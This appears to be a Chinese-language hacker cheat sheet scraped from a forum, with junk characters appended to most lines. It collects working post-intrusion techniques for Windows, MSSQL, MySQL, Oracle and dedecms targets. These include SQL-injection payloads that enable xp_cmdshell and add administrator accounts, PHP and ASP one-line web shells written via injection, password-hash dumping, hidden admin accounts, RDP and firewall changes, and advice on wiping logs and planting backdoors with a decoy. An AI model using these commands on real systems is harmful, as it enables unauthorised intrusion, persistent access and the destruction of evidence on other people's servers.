) w" R9 G# M+ G! j! _
1.net user administrator /passwordreq:no
. e6 f+ a7 w5 B8 z" A. |这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了3 ~ q" S7 Y% W1 O9 S7 J; ~
2.比较巧妙的建克隆号的步骤4 z& [) e' j1 N* d, D4 _
先建一个user的用户2 O3 G' E2 y M5 ^- \" t
然后导出注册表。然后在计算机管理里删掉
' _# K$ q1 y3 ]0 `+ U8 V* y% g- L0 A在导入,在添加为管理员组2 S" J# M& @2 s: [4 `9 t
3.查radmin密码
0 }6 Q4 n# O; T* r6 v. Jreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
5 D( o) O" T1 A4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]8 X# D M, ^$ P* G+ F1 J; J
建立一个"services.exe"的项
% |) J# w6 B9 \8 U" X+ X3 A+ }再在其下面建立(字符串值)
9 T" b4 Y. x: p" ^键值为mu ma的全路径. Y8 J" O3 c2 Y9 u
5.runas /user:guest cmd
) N* P! q5 s, B测试用户权限!/ O' }0 g* v3 u8 }7 G$ y) X+ ^
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?5 I ?+ o: S; a& ?
7.入侵后漏洞修补、痕迹清理,后门置放:
8 Y* ]6 W+ _- j* ?. q基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
' r* F s4 g3 M8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
% |( S; r. Q( t% T: F& d
2 Z% v" X1 M/ ]' k, Tfor example0 r% ~: b! R3 M0 U' Q
6 N/ _$ S1 t- U) N2 [9 ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
" a5 J+ P7 W1 k9 n% b
& f2 K) P, L E- s) Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
$ @( `% h8 _0 ]& I: K# i6 W0 A' |
/ l' `+ a- A* e$ g" R9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
# r% S, _' M7 n+ J如果要启用的话就必须把他加到高级用户模式
1 h. `+ U e8 a5 H) `* T可以直接在注入点那里直接注入
' ]& \# q& i, l6 v+ A9 [id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
' y3 x* R% l. i& @5 S0 U: S" i然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
) v, J$ O4 R4 B: f或者
+ O9 U; H& Z; p/ jsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
( X3 S$ I+ Y; r来恢复cmdshell。
7 M# a& w$ ?. R7 s: O6 H3 ~! E. f0 o" y& y. ^' x
分析器
$ {; c9 `+ ]- M5 CEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--. E1 ^6 k' w- d& D- c
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")/ y& ~* S1 S5 B; t+ m' v9 m$ M
10.xp_cmdshell新的恢复办法) M& [5 Q- k$ H, o& W" `
xp_cmdshell新的恢复办法5 D- O0 A1 P" [/ c% M: I. }# y
扩展储存过程被删除以后可以有很简单的办法恢复:. j$ ~* v! H, z: ~+ m
删除
2 U5 v# ~1 m3 a% z* k1 ~drop procedure sp_addextendedproc
8 U4 o( r% ^* }drop procedure sp_oacreate
, ]; G$ ?7 R8 f4 }; E* Wexec sp_dropextendedproc 'xp_cmdshell'
% c& _$ C+ |. A" {2 L5 B+ s" {( S% N, |9 X& F* `
恢复$ `; S! O0 ~ {8 l: e- N
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
- O/ X2 F& r/ s6 x( k) }dbcc addextendedproc ("xp_cmdshell","xplog70.dll")5 g4 B$ v! @+ [6 S
- i$ y/ j+ B/ k" |( b# U这样可以直接恢复,不用去管sp_addextendedproc是不是存在7 b) V0 e, j+ [. u1 u
$ Q! ]: c! H7 A0 w9 g& p
-----------------------------
+ B! }3 \' F' a! u3 \8 ?: u1 S* S& t; q2 e: E+ @
删除扩展存储过过程xp_cmdshell的语句:
! g4 u* E: Y Vexec sp_dropextendedproc 'xp_cmdshell'4 ] M% C/ q" }+ d m W' y
6 x+ K1 L, t/ w1 p3 }7 M/ E- y
恢复cmdshell的sql语句4 d1 D+ |6 ]! I! m) P
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
! z$ |" U$ [6 b1 q' A3 ~8 a s
' n- U; @9 v2 Q1 y7 t) U3 c
( _( y& x, N# `- f+ W3 x) D! Q( G开启cmdshell的sql语句' d* X5 P9 a) V3 V& T" t q
) C' r1 B- G7 V' q' Rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
& O1 p9 l8 s5 e2 i. w6 S# l, N2 c" m) r& h
判断存储扩展是否存在
$ `" G' ^6 P; c* H+ _0 h [select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell': d$ L3 o; c: m2 H2 {5 @
返回结果为1就ok" a* R" k) g+ N, ^6 }) M4 E5 s
8 g+ y) Q; q+ c" v* }2 }$ C+ @ \; q
恢复xp_cmdshell( m8 r# F5 }) Y
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' W4 C/ f, ^ i' {) o; ~0 K# v
返回结果为1就ok
6 [ X7 r. a) A; Z4 y) B$ |+ c5 x: K% q8 h0 d5 ?
否则上传xplog7.0.dll/ p* P* X- D V) t( J! L; l
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
/ B9 S/ S! \9 \9 h7 s
3 g8 ]- v* S$ N6 N. M" @0 s堵上cmdshell的sql语句 e( w/ j [( }4 i
sp_dropextendedproc "xp_cmdshel
) u# W; x4 {6 s& F5 E2 {! P-------------------------' @) L0 t3 L ~
清除3389的登录记录用一条系统自带的命令:
: f) {7 [! A/ E; o$ X5 _9 ireg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
3 ]; i# e0 [4 Q
; E# M2 J3 x& K7 h" H T0 L然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件) u4 V4 F* {( k) R" L1 }- o
在 mysql里查看当前用户的权限
" H+ b2 i" W1 A( X* ~show grants for
w% E* Z Z9 v; E j0 x6 j) U% R; _0 {, e
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
0 ^4 d% p3 H& U& ]- [& i6 v* f& V6 `3 G2 {1 f1 Z
6 P" |) l1 ?: L. ZCreate USER 'itpro'@'%' IDENTIFIED BY '123';
9 D7 _! q2 s3 [, H8 G3 f* e* W2 a* W B
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION3 {* P2 G5 F+ d
$ t1 Y1 W, N3 W; @" x# TMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 04 ~, n8 P* |/ l; f" p0 O
( ~/ F* v/ `$ J$ c& S9 V
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;' t8 ]% I8 n# C' l- [
9 J4 C7 J# I3 X' }3 _搞完事记得删除脚印哟。0 y3 w- N2 i1 e, V4 ?
. P& _! U" _/ f. r8 l- MDrop USER 'itpro'@'%';
( A" O( N$ m, @1 L; t3 x; }; F# j0 F; N9 y
Drop DATABASE IF EXISTS `itpro` ;
+ n& x0 R: Y! B8 i2 B
4 T$ q9 [2 X {) J2 ]! x8 t当前用户获取system权限
, B4 L) h {: a" s- \* V# csc Create SuperCMD binPath= "cmd /K start" type= own type= interact
& g m/ h- G& i( w3 Fsc start SuperCMD
6 `7 G: F( z. j# L" s! v& k程序代码
5 p5 R; S! j& L5 O7 _<SCRIPT LANGUAGE="VBScript">; `. j9 e9 o( k% y' _# w
set wsnetwork=CreateObject("WSCRIPT.NETWORK")6 J" ~" F! z% h9 U4 e0 c
os="WinNT://"&wsnetwork.ComputerName6 P" m( J8 z% P+ g1 v$ c6 P: x
Set ob=GetObject(os)0 t! {9 F1 q4 m; W, w! {9 ~
Set oe=GetObject(os&"/Administrators,group")0 _6 h3 s9 n5 W d
Set od=ob.Create("user","nosec")
" D* W$ l7 H) A" f8 f; Mod.SetPassword "123456abc!@#"( n ]6 E2 q# H- j& Q
od.SetInfo* }) W, I8 B+ V" G* t0 J' Z) d
Set of=GetObject(os&"/nosec",user)6 L9 }, B, t' X" \( i+ h5 V
oe.add os&"/nosec"
( {( }8 ?; v6 H</Script>* j" h) C! V7 h7 q. m, w
<script language=javascript>window.close();</script>
' c3 o1 r9 X+ W6 y, d- V. V1 e3 W, h* Q N! H1 E/ [
8 \& o' E; A/ a" R, l: r: R! b) J: k8 Y+ s; k" I; b, W& c
8 n9 j$ B9 R8 S5 [, i& V, `突破验证码限制入后台拿shell- _3 N2 z& F" c9 {0 J# t3 _
程序代码 r- y# I$ }, K9 d! r4 L+ _9 @$ Y
REGEDIT4
1 ^4 y, T8 S/ ^7 ?8 ^) O+ A0 Q[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] K% O# k" V I, Z/ R+ M
"BlockXBM"=dword:000000007 H% o5 r2 ^5 ] Y; G( g: \6 R3 x
( }) v* Y8 ~& m保存为code.reg,导入注册表,重器IE
Q }7 `7 _% \3 ]2 x4 U+ u就可以了2 S& ]& N# u2 @3 } w; o9 _0 o
union写马
( J' T5 V$ C ?/ d程序代码
* B% W; S$ w8 K" X [6 X& ]9 Qwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*+ L9 |: x6 a7 p! J: c B
. O. C7 ?; a, P/ [* i( d应用在dedecms注射漏洞上,无后台写马, _0 P9 s: E# t1 `4 J' O
dedecms后台,无文件管理器,没有outfile权限的时候7 Y+ P' M5 Z5 l+ E+ o1 ]+ t; |4 P
在插件管理-病毒扫描里5 ~, t) C& I% T0 K0 O
写一句话进include/config_hand.php里
9 ]$ S! f8 I; }6 t& u) s+ E! d, z程序代码
" A' q' w4 ?3 k>';?><?php @eval($_POST[cmd]);?>
5 A, b. D3 O+ T0 Y) P7 {
( x2 r( T/ I7 U$ {+ y
( k. |0 u+ }6 G- B2 r如上格式4 h: [. M# s9 v) S- m% @: h: i
9 l/ \7 f9 l/ z; Soracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
; P- y) w f0 U- h; s8 q& B/ R程序代码, M) P9 {1 ~( [0 z
select username,password from dba_users;
/ h1 z6 g* y; S2 I; Q' C# `, K
/ c+ M2 J, h* G" w+ x0 @" ~* ~# C" ^7 c, E% y- z
mysql远程连接用户4 Q' T- k9 m* F
程序代码' l% I" M) V: y: }) z9 m3 h, N
* f* N7 t, d* q. V) L3 r% D; \Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
0 N" Q8 Y" F$ B) a* ZGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
$ _9 a; Z+ `$ n, [7 f6 M' p& yMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# b M# q7 u6 l, q% W) H% _
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
! M! u# N3 ^% E
3 ]5 \ X* l3 ]+ N. p1 Y, b) _1 e8 y8 V! i; \; g
' d. {; P/ L7 |( V
, E2 X8 {6 E" {& T' g3 Iecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0( ^! t7 o: W8 g" ]1 \/ R
" Y2 F2 M' l0 j" G' f1.查询终端端口& s2 x& s b- N8 |8 P
- ]/ T' \$ r$ q* `4 X
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber, q/ q, `6 l$ F: {# {
! Y4 j7 Y5 N! q; g
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"" ^3 M: Y1 L& k7 ^- U
type tsp.reg
1 a6 |: f' y) C
# I5 t4 Y6 J# Y$ x* |; i# | }2.开启XP&2003终端服务
' @9 M( V$ _' x* D1 @+ C5 g, W3 t! b% k! U" [
; X3 |+ Q' X" ?5 B1 IREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3 G! [; X) l* d8 u8 F8 n% i% L
1 g' ~& M4 c; n2 e6 n) O" n/ _, y! W5 f- D- o/ d# e8 @
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
' {' E' Y U! w) C5 `5 |, \# g5 |* [3 m D
3.更改终端端口为20008(0x4E28)7 A/ H5 A) |. n
* W9 H. g/ {6 R& w3 a6 UREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
+ L; ~+ @' t9 C2 u
# D. F3 L# I cREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f+ A' D) O; x' M
. X; u- m# u$ k" o4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制 |0 L4 q: L, f$ H, E1 Y2 `
# i& p; l/ ^( y2 S& KREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
7 x7 ^: e+ G% l/ Z
! m8 ]( M6 p: P# a5 i1 h" v3 F- [! g# e7 G
5.开启Win2000的终端,端口为3389(需重启)
+ E+ U( [9 R7 L8 w0 n3 I8 W& A2 l, `3 L0 X
echo Windows Registry Editor Version 5.00 >2000.reg
8 ]6 `* _/ H+ y& G5 v& }" Xecho. >>2000.reg# N' e" j& y3 z* S. J9 k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 5 f t1 }- e1 N& P& m/ `+ S# |
echo "Enabled"="0" >>2000.reg
% Z3 _3 C8 r3 [# E! H' J' j. a7 ~) G Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg - l$ }; B4 F. z/ ~: p8 r# l
echo "ShutdownWithoutLogon"="0" >>2000.reg # f7 H2 ^7 T6 O( V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg " |8 r) r q* d9 N' J& S9 o
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg ) A/ X4 Q, v4 c1 o& ]3 g$ m8 o4 S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
# u. T; @( Z, Z- s6 S$ u$ ?echo "TSEnabled"=dword:00000001 >>2000.reg 8 ?; `( a; g8 f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 9 c& v, b% X6 b$ e" Q
echo "Start"=dword:00000002 >>2000.reg
. y1 h7 j3 u- j+ u; Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg . n& i9 U7 V- Y2 k; k5 E7 v: s. v
echo "Start"=dword:00000002 >>2000.reg 5 g( o+ j' n1 t' \ K& m0 `3 }
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
$ m( }# y- P, ?/ [echo "Hotkey"="1" >>2000.reg 6 t. `( C1 V; i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg D6 A& ]7 |; B: J n% ?
echo "ortNumber"=dword:00000D3D >>2000.reg
3 ?) F' a6 J3 O6 Y. I' a& eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg % o1 X0 L5 H* l6 l1 L' {( G, o
echo "ortNumber"=dword:00000D3D >>2000.reg% P+ p4 d$ H P3 j9 x) f: b
4 A( l v* A9 r4 k6 e
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)+ Z- a- D" @; c$ U+ X2 X' p5 w
4 q3 D; `. b, ?1 z7 d6 |& P& c@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
: b' V# i. f- t+ h(set inf=InstallHinfSection DefaultInstall)
1 ]& j4 h: @. c/ f/ W+ N4 h, }echo signature=$chicago$ >> restart.inf
! P `% G6 n8 A: z" R$ Zecho [defaultinstall] >> restart.inf0 w7 s% S7 }& U! p
rundll32 setupapi,%inf% 1 %temp%\restart.inf
) {5 c' g- N) [+ u
$ I" d0 ^" R+ j; h# n& K) m# i, a' A0 s
7.禁用TCP/IP端口筛选 (需重启)8 O; T1 l' l3 h' V9 u& S7 W8 O1 q
k* {; `, l# b3 A% \" y8 z2 Z* U# k% M
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f7 i* n; v2 S" z, z5 i8 a% N
7 }' G/ N6 E `) S8.终端超出最大连接数时可用下面的命令来连接
; a: ~+ G' l6 z. b
; F& L* R0 s9 u5 U7 Pmstsc /v:ip:3389 /console- z8 G! e* _. M4 B
" ]% e: p/ e, g: y6 W/ Z m1 r# o2 p
9.调整NTFS分区权限% `8 d$ |* [" ^& d
. Z f/ R' z" U! t
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)5 ^0 ^7 v. b' i: B$ F
# g. ^0 d6 V6 u- _8 M
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)4 @# T9 ]6 s9 z
! ~$ `% A/ w: v
------------------------------------------------------
9 V% N' D K# ]9 R: O3389.vbs ) t l1 w) F( K' ]* a8 h J5 E
On Error Resume Next. e5 M+ }) w* c4 r; F
const HKEY_LOCAL_MACHINE = &H80000002: s$ W* S0 C" M) _ j y' }+ D
strComputer = "."
- c. f: Z m. z4 z5 ^7 X x3 qSet StdOut = WScript.StdOut6 |" Y+ f U: r" ^: e
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
4 q( M- S' |- f; I# h) bstrComputer & "\root\default:StdRegProv")
( n! @9 ~+ w$ `5 r5 |3 ]( NstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
) F: k" o7 N: b' Zoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath' E% P, i) Q# [/ O$ F+ a0 B+ X3 w
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"$ W+ N: L/ x: _; R6 U* t: W
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
( s% J6 I: [+ i$ fstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp") W2 A- c; x' u3 f$ M
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server", v3 |8 B! G/ p
strValueName = "fDenyTSConnections"( E. k# c* M' ?' K) X6 O
dwValue = 0
& a" O6 C2 l- _& H. _$ \7 k# Zoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# p) X# \7 y. z( YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
9 E" u* |, {6 ?. |4 t2 tstrValueName = "ortNumber"
3 N6 W$ W% p( C& B7 P, n" OdwValue = 3389
, T8 M1 q$ j9 j4 K- H: ooreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue, N% o& B# s. f! H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
! _2 d* w5 G4 q I4 u# _strValueName = "ortNumber"
$ M/ F/ d6 O7 T* s) odwValue = 33891 V% u# E8 H5 a$ w* Y4 p
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 U1 D8 J# C2 _) c' QSet R = CreateObject("WScript.Shell")
$ @/ L* @0 T d3 Q* mR.run("Shutdown.exe -f -r -t 0")
. ^1 z( j- H' I( t0 v; j, H
6 a9 _% O+ [" I3 x! o( ~; G! C+ Q" [删除awgina.dll的注册表键值$ q0 U1 O& @& H' [ D
程序代码 ~' Z4 u" R4 h& L: e8 ` M4 I
& p) U- N# c6 c" [2 [, ]
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
8 w( b! t9 ^+ E1 W8 n
% y" w* ?5 W+ ?6 r' Z& L- N: d) |7 a; a% D- g
" J1 u* G% j( I! A/ k6 U& K v" g
* w7 R! W- [" z& [- Q! K程序代码
6 K6 z! y2 K6 P2 C' r) VHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash$ b9 d$ G$ Q& ~6 F8 ^0 Z# E0 f
- F) Y4 T7 x. w# B9 v. D$ R
设置为1,关闭LM Hash# t$ ~! Q$ G0 B1 e2 c: Y
8 d( l1 @2 X: J& z& X7 R3 b
数据库安全:入侵Oracle数据库常用操作命令. r$ f4 f- b; x: Z1 T) y
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
% H6 J; H! K7 o7 K1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
: }' _+ O! _8 A$ M, P2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
. G/ Q. c+ h+ t: K Y4 i3、SQL>connect / as sysdba ;(as sysoper)或
. [% l! C, I" ]; |5 Uconnect internal/oracle AS SYSDBA ;(scott/tiger)9 E* t) {' I9 P5 C/ b4 j/ a: W
conn sys/change_on_install as sysdba;' p2 {! C" Y) F- n' O* M, C" \
4、SQL>startup; 启动数据库实例
$ b% c" o# n- F$ z" F, M# `" p! a5、查看当前的所有数据库: select * from v$database;
$ j `6 F7 [6 ?select name from v$database;
* x% \* b G1 Z6、desc v$databases; 查看数据库结构字段
" M2 m" K" v7 R" U3 Z4 t7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
: ]& S& {/ \: p+ w( U$ u- qSQL>select * from V_$PWFILE_USERS;
6 M5 |$ P9 l2 M8 qShow user;查看当前数据库连接用户( L! X$ ?* ?/ ]' ^6 o" `
8、进入test数据库:database test;' W% V) ~ W8 V6 y
9、查看所有的数据库实例:select * from v$instance;
/ L8 G- b/ N# W# v1 T如:ora9i. g: z' L5 A7 z6 o/ u
10、查看当前库的所有数据表:5 l( l; x N6 V# Y: Z* t4 Y) r
SQL> select TABLE_NAME from all_tables;
+ k Q3 O$ }7 x1 I+ ?0 U* wselect * from all_tables;
+ K3 J& n8 n* B$ N. b+ h" p9 gSQL> select table_name from all_tables where table_name like '%u%';7 C7 V0 V9 G# |) }' v. B# c
TABLE_NAME. V$ J: e" d Z
------------------------------) d& a1 v0 s; i1 O3 A7 W
_default_auditing_options_
- E) j+ u+ C1 [4 e9 V$ T2 {% W11、查看表结构:desc all_tables;
0 a: N/ t. [) v* y& p K12、显示CQI.T_BBS_XUSER的所有字段结构:
7 g( F I) j3 V( v6 w" ]7 m# [desc CQI.T_BBS_XUSER;) x, C& U7 v) _. x% O8 D
13、获得CQI.T_BBS_XUSER表中的记录:
) ^; l U# J Rselect * from CQI.T_BBS_XUSER;
' ^& _! r0 ^8 \" B1 K# F14、增加数据库用户:(test11/test)+ U8 c& }( z3 d
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
. i5 C5 Q3 s+ O) l9 i" y15、用户授权:4 D. Q X5 l* P+ ^1 L, V
grant connect,resource,dba to test11;' W4 d2 x; N; e' i( U
grant sysdba to test11;
# Q: i' j' p; F( `. |8 hcommit;5 s/ d' G, }# U' L
16、更改数据库用户的密码:(将sys与system的密码改为test.)' T5 ?7 V: L7 e
alter user sys indentified by test;
+ j4 x3 h8 x; E+ c, Calter user system indentified by test;
+ Z1 W6 J" S( C0 i" _+ ?) e6 i7 \, a5 g9 X9 X# L: E
applicationContext-util.xml
. C) W e! s' P1 A8 {applicationContext.xml
/ W5 M( z+ V B0 x* L7 nstruts-config.xml- A3 c) K& w1 w5 R2 X% V# F, L
web.xml
I5 j) s: m7 }% T9 X7 mserver.xml, a& a+ b* y# u4 E
tomcat-users.xml" l6 E' p, j; `5 P& c/ M- v5 m
hibernate.cfg.xml/ b+ G6 q+ o* o+ h
database_pool_config.xml8 w3 c3 {% Z7 ~- p1 B1 |3 C+ \
* ?! V# g$ Y: G6 d
, {: J, W" U/ X; O5 h8 w\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置, n4 v1 Z8 e3 p! Z
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
! v: S O) p5 t' K\WEB-INF\struts-config.xml 文件目录结构; Y3 ]" z, _+ d9 ^. @: e& \7 |
, s( w% N7 \3 S L; n3 ~( {* x
spring.properties 里边包含hibernate.cfg.xml的名称
' ~6 V: i* ?* E4 v+ a% z( G5 H' |6 \+ Q/ {; H, P
y. W% B3 n' V7 F0 \
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml7 f( y5 u: J, {5 {" L# k
$ [2 J4 s! ^' d) L% r) V
如果都找不到 那就看看class文件吧。。
7 I& c: G# Z6 r! i' ~7 e9 P, W: r3 a$ K% O5 U/ Q& X7 @
测试1:/ p. V# M- |- }4 p7 l$ B0 u
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
- C3 t5 i8 M* R1 N- S6 q6 E# Y1 h. I: \* E* N
测试2:" S! T: D" s% V
* o- \* j" E* O% x1 b% B0 H6 w! h7 icreate table dirs(paths varchar(100),paths1 varchar(100), id int)6 W& W% V" ?3 z
* a, ]9 }3 p5 O8 U) q$ w1 ]7 ]* l$ X
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
& z- D- z* y$ ^9 `% P2 N* U; T7 T
. ?1 _- q M6 |0 y u% D) i& J7 rSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1; x# _7 R) V( g% A( S( m3 [8 h- t9 i- Y
[- ]* Z. L6 B1 @( i0 H0 |1 P# T4 z查看虚拟机中的共享文件:2 ?# N( M% ?1 _3 O( P% t$ v0 W/ r. g
在虚拟机中的cmd中执行' s3 M2 w5 M: ~! |
\\.host\Shared Folders
; ^2 n1 s% a1 P; h. r6 D; C- L3 E7 @, C5 s
cmdshell下找终端的技巧3 f# s+ V: c' h
找终端:
" u! N; t, X, ?% i# U' g: z7 {/ T [第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
2 s; o. a6 J# R/ L/ y 而终端所对应的服务名为:TermService
/ c5 F2 f, M+ i* \5 f2 o; v! D# s第二步:用netstat -ano命令,列出所有端口对应的PID值! : @' R# l# Z" p# m9 Q
找到PID值所对应的端口+ D% A: ^+ z' ~- V: \0 d0 e
8 f- W1 O, y" K' S查询sql server 2005中的密码hash# q$ K H' y9 e6 C
SELECT password_hash FROM sys.sql_logins where name='sa'* e1 H8 V, K4 `( l
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a6 _9 v* V8 F. m7 E' A/ m: u0 d0 i
access中导出shell4 @; I0 K/ ]) l
/ h r' N7 \0 {3 t
中文版本操作系统中针对mysql添加用户完整代码:" e c! ` @/ X
& t8 k. Z4 O% S0 y7 v3 g
use test;
+ A7 Y" c2 v% O" r$ u/ K$ a! Jcreate table a (cmd text);
